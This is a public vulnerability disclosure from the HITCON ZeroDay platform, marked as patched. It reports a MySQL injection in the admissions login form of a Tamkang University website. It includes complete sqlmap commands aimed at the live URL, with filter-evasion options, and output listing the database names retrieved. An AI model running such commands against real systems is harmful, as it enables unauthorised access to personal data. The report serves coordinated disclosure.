淡江大學 mysql注入漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2026-01030
  •  發信 Vendor: 淡江大學 115 學年度進修學士班(考試入學) 招生考試
  • Title: 淡江大學 mysql注入漏洞
  • Introduction: mysql注入漏洞

處理狀態

目前狀態

公開
Last Update : 2026/09/07
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2026/08/15 10:13:12 : 新提交 (由 桃園怪人協會幹部之一 更新此狀態)
  • 2026/08/15 10:23:34 : 新提交 (由 桃園怪人協會幹部之一 更新此狀態)
  • 2026/08/18 17:23:56 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/08/31 16:28:21 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/08/31 16:28:21 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/08/31 16:28:21 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/09/03 10:57:35 : 複測申請中 (由 組織帳號 更新此狀態)
  • 2026/09/03 16:12:46 : 確認已修補 (由 桃園怪人協會幹部之一 更新此狀態)
  • 2026/09/07 03:00:11 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://ckaws0a.web.tku.edu.tw/ip/115/www/13320

敘述

※ 請使用 Chrome、Edge、Firefox 等瀏覽器。
※ 報名時間: 2026-07-30 10:00 至 2026-08-18 10:00。

換句話說 漏洞有效期間2026-08-18
自從我回報3天後 那我回報有效嗎?

查數據庫名 (e15ede)

sqlmap -u "https://ckaws0a.web.tku.edu.tw/ip/115/www/13320/sign_io.login_user" \
--data "user_id=a234123234a%40gmail.com&pwd=asdasdasd" \
-p "user_id" \
--dbms=mysql \
--current-db \
--batch \
--random-agent \
--threads 3 \
--tamper space2comment \
--hex

查身分 (ivp101@localhost)
sqlmap -u "https://ckaws0a.web.tku.edu.tw/ip/115/www/13320/sign_io.login_user" \
--data "user_id=a234123234a%40gmail.com&pwd=asdasdasd" \
-p "user_id" \
--dbms=mysql \
--sql-query "SELECT current_user" \
--batch \
--random-agent \
--tamper space2comment \
--hex

查DBA權限 無DBA
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.0

sqlmap -u "https://ckaws0a.web.tku.edu.tw/ip/115/www/13320/sign_io.login_user" \
--data "user_id=a234123234a%40gmail.com&pwd=asdasdasd" \
-p "user_id" \
--dbms=mysql \
--privileges \
--batch \
--random-agent \
--tamper space2comment \
--hex \
--time-sec 5

列舉數據庫

sqlmap -u "https://ckaws0a.web.tku.edu.tw/ip/115/www/13320/sign_io.login_user" \
--data "user_id=a234123234a%40gmail.com&pwd=asdasdasd" \
-p "user_id" \
--dbms=mysql \
--dbs \
--batch \
--random-agent \
--threads 3 \
--tamper space2comment \
--hex
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[10:02:38] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[10:02:43] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[10:02:49] [ERROR] invalid character detected. retrying..
[10:02:49] [WARNING] increasing time delay to 6 seconds
[10:04:02] [INFO] retrieved: 120
[10:12:01] [INFO] retrieved: information_schema
[10:16:04] [INFO] retrieved: admreport
[10:19:29] [INFO] retrieved: cmn14_b1
[10:22:42] [INFO] retrieved: cmn15_b1
[10:22:42] [INFO] retrieved:

不爬出整個數據庫了 跑太久

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;